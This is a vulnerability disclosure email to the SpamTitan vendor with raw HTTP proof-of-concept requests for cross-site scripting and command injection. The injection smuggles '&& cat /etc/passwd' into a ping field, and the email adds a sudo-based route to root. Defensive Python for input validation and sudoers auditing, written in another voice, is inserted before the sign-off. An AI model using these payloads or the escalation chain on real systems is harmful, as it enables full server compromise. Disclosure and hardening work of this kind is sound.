Hello,

I'm Luca Carettoni, an independent security researcher. I have found several vulnerabilities in your product "SpamTitan". According to the ethical full disclosure policy (http://www.wiretrip.net/rfp/policy.html), please find enclosed the security findings.

##########################################
(a) Directory listing enabled by default

Severity: Low
Local/Remote: Remote

Proof-of-Concept:

/lib/
/include/
/cluster/
/api/
/amavis-stats/
/js/
/imgs/
/locale/
/styles/
/yui/

##########################################
(b) Multiple Cross-Site Scripting

Severity: Medium
Local/Remote: Remote

Proof-of-Concept:

POST /setup-relay.php HTTP/1.1
Host: x.x.x.x
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://x.x.x.x/setup-relay.php
Cookie: PHPSESSID=7f5ad053266881d4v8b143d2a53f010e;
Content-Type: multipart/form-data; boundary=--------366333200
Content-Length: 1742

----------366333200
Content-Disposition: form-data; name="button"

Addb26b5">69d00f4e5d0

Client-side flaws are widely spread within the application. No input validation is actually performed. Almost all semi-automatic vulnerability scanners may be able to detect these findings.
For more info: http://en.wikipedia.org/wiki/Cross-site_scripting

##########################################
(c) Arbitrary Code Execution

Severity: Medium (authentication is required)
Local/Remote: Remote

Proof-of-Concept:

POST /runcmd.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: PHPSESSID=7f5ad053266881d4v8b143d2a53f010e
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 330

-----------------------------265001916915724
Content-Disposition: form-data; name="action"

ping
-----------------------------265001916915724
Content-Disposition: form-data; name="pinghost"

127.0.0.1 && cat /etc/passwd
-----------------------------265001916915724--

Several scripts are vulnerable to such injection. No input validation is performed at all.

##########################################
(d) Privilege Escalation

Severity: High
Local/Remote: Remote

Abusing the current "sudo" configuration:

...
amavisd ALL=NOPASSWD: /bin/cp
...

it is possible to obtain a root console on the system and entirely compromise the platform.

##########################################

As a result of these findings, it is possible to remotely compromise the entire platform using the following attack scenario:

1) An aggressor sends a crafted email to the sysadmin (social engineering required)
2) Exploiting the XSS, the aggressor is able to log in to the admin web console
3) Exploiting the code execution weakness, it is possible to execute arbitrary commands as "amavisd"
4) Replacing one "sudo" binary with "/bin/bash", it is possible to obtain a root console. This is feasible thanks to the sudoers misconfiguration.
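As an added illustration of the input validation that finding (c) says is absent (this is not code from SpamTitan or from the advisory), the following Python handler accepts only an allowlisted action and a syntactically valid IP address or hostname for the "pinghost" field, and runs the resulting command without a shell. The function names (validate_host, build_ping_argv, run_action) and the dict of form fields are this example's own assumptions; the product itself is PHP, so this shows the principle rather than a drop-in patch.

```python
"""Hardened handling of the runcmd.php 'action'/'pinghost' parameters.

Added example, not SpamTitan code: it shows the validation that finding (c)
says is missing, in Python rather than PHP. Function and field names are
this example's own assumptions.
"""
import ipaddress
import re
import subprocess

# Only the operation the proof-of-concept exercises; anything else is refused.
ALLOWED_ACTIONS = {"ping"}

# One RFC 1123 hostname label: letters, digits, hyphens; no leading/trailing
# hyphen, at most 63 characters. Spaces, '&', ';', '|' and '/' can never match.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def validate_host(value: str) -> str:
    """Return value if it is an IP address or a well-formed hostname.

    Raises ValueError otherwise. The check is a positive grammar, not a
    blocklist of shell metacharacters, so an input such as
    '127.0.0.1 && cat /etc/passwd' fails on the spaces and '&' alone.
    """
    value = value.strip()
    if not value or len(value) > 253:
        raise ValueError("empty or overlong host")
    try:
        ipaddress.ip_address(value)  # accepts IPv4 and IPv6 literals
        return value
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    if all(_LABEL.match(label) for label in labels):
        return value
    raise ValueError("host is neither an IP address nor a valid hostname")


def is_valid_host(value: str) -> bool:
    """Boolean wrapper around validate_host for callers that just need yes/no."""
    try:
        validate_host(value)
        return True
    except ValueError:
        return False


def build_ping_argv(fields: dict) -> list:
    """Map the submitted form fields to an argv list.

    The command is assembled as separate arguments and executed with
    shell=False, so the host value can only ever be one argument to ping,
    never a second command.
    """
    action = fields.get("action", "")
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"unsupported action: {action!r}")
    host = validate_host(fields.get("pinghost", ""))
    return ["ping", "-c", "3", host]


def run_action(fields: dict) -> str:
    """Execute the validated command without a shell and return its stdout."""
    argv = build_ping_argv(fields)
    completed = subprocess.run(argv, capture_output=True, text=True,
                               timeout=30, check=False)
    return completed.stdout


if __name__ == "__main__":
    # Constructed form submissions: a legitimate one, and the injection
    # attempt from the proof-of-concept above, which is refused.
    print(build_ping_argv({"action": "ping", "pinghost": "127.0.0.1"}))
    try:
        build_ping_argv({"action": "ping",
                         "pinghost": "127.0.0.1 && cat /etc/passwd"})
    except ValueError as exc:
        print("rejected:", exc)
```

The two design choices that matter are the positive grammar (anything that is not an address or hostname is rejected, rather than trying to enumerate dangerous characters) and the argv-style execution, which removes the shell from the path entirely so that even a validation slip cannot turn one argument into two commands.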
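For finding (d), the following added Python script (not SpamTitan's or sudo's own code) shows how an administrator can audit a sudoers file for the class of rule the advisory quotes: a NOPASSWD grant on a command that can overwrite arbitrary files, which lets that account replace other root-run binaries. The parser handles the common "user host=(runas) TAG: cmd, cmd" shape only; the sample sudoers text, the FILE_WRITING_COMMANDS list and the function names are this example's own constructed assumptions.

```python
"""Audit sudoers rules for NOPASSWD grants on file-writing commands.

Added example for finding (d), not SpamTitan's or sudo's own code: a small
parser that flags rules such as 'amavisd ALL=NOPASSWD: /bin/cp'. The sample
sudoers text and the command list are constructed assumptions.
"""
import re

# Commands that can overwrite arbitrary files. A NOPASSWD grant on any of them
# lets that account replace other root-run binaries, which is the escalation
# path the advisory describes.
FILE_WRITING_COMMANDS = {"/bin/cp", "/bin/mv", "/bin/dd", "/usr/bin/tee",
                         "/usr/bin/install"}

# 'user host=(runas) TAG: cmd, cmd' with runas and tags optional. Aliases and
# more exotic syntax are outside what this example handles.
_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+?)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Constructed sample modelled on the excerpt in finding (d); not a real file.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL) ALL
amavisd ALL=NOPASSWD: /bin/cp
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /bin/dd
ops     ALL=(ALL) /usr/bin/systemctl restart amavisd   # password still required
"""


def parse_sudoers(text: str) -> list:
    """Return one dict per user specification line.

    Comments, blank lines, Defaults and alias definitions are skipped.
    """
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(
                ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")):
            continue
        match = _RULE.match(line)
        if not match:
            continue
        tags = {t.rstrip(":") for t in match.group("tags").split()}
        cmds = [c.strip() for c in match.group("cmds").split(",") if c.strip()]
        rules.append({"user": match.group("user"), "tags": tags,
                      "cmds": cmds, "line": line})
    return rules


def find_risky_rules(text: str) -> list:
    """Return (user, command) pairs where NOPASSWD covers a file-writing
    command or the ALL wildcard."""
    findings = []
    for rule in parse_sudoers(text):
        if "NOPASSWD" not in rule["tags"]:
            continue
        for cmd in rule["cmds"]:
            path = cmd.split()[0]  # first token is the command path
            if path == "ALL" or path in FILE_WRITING_COMMANDS:
                findings.append((rule["user"], path))
    return findings


if __name__ == "__main__":
    for user, cmd in find_risky_rules(SAMPLE_SUDOERS):
        print(f"{user}: passwordless {cmd} can overwrite root-run binaries")
```

Run against a real file with `find_risky_rules(open("/etc/sudoers").read())` as root; on the constructed sample it reports the amavisd /bin/cp rule and the backup /bin/dd rule, while the ops rule is left alone because it still requires a password. The remediation the audit points at is the same in every case: grant a narrowly scoped wrapper script rather than a general-purpose copy or write tool, and never combine such a tool with NOPASSWD.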
This policy encourages open communication, and I look forward to working with you on resolving the problems detailed.

Regards,
Luca C.